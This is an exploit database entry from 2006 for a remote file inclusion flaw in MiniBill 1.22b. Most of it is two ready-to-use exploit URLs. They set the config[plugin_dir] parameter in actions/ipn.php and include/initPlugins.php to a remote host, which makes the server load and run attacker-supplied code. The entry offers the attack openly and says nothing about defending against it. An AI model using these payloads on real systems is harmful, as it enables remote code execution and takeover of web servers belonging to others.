MiniBill <= 1.22b config[plugin_dir] Remote File Inclusion Vulnerabilities

2006-08-29T00:00:00
ID 1337DAY-ID-758
Type zdt
Reporter the master
Modified 2006-08-29T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==========================================================================
MiniBill <= 1.22b config[plugin_dir] Remote File Inclusion Vulnerabilities
==========================================================================



########################################################################
#  MiniBill v1.22 Beta  Remote File Inclusion Vulnerability
#
#  Found By: the master
#
########################################################################
#  exploit:
#
#
http://[Target]/[Path]/actions/ipn.php?config[plugin_dir]=http://cmd.gif?
#
http://[Target]/[Path]/include/initPlugins.php?config[plugin_dir]=http://cmd.gif?
########################################################################



#  0day.today [2018-01-08]  #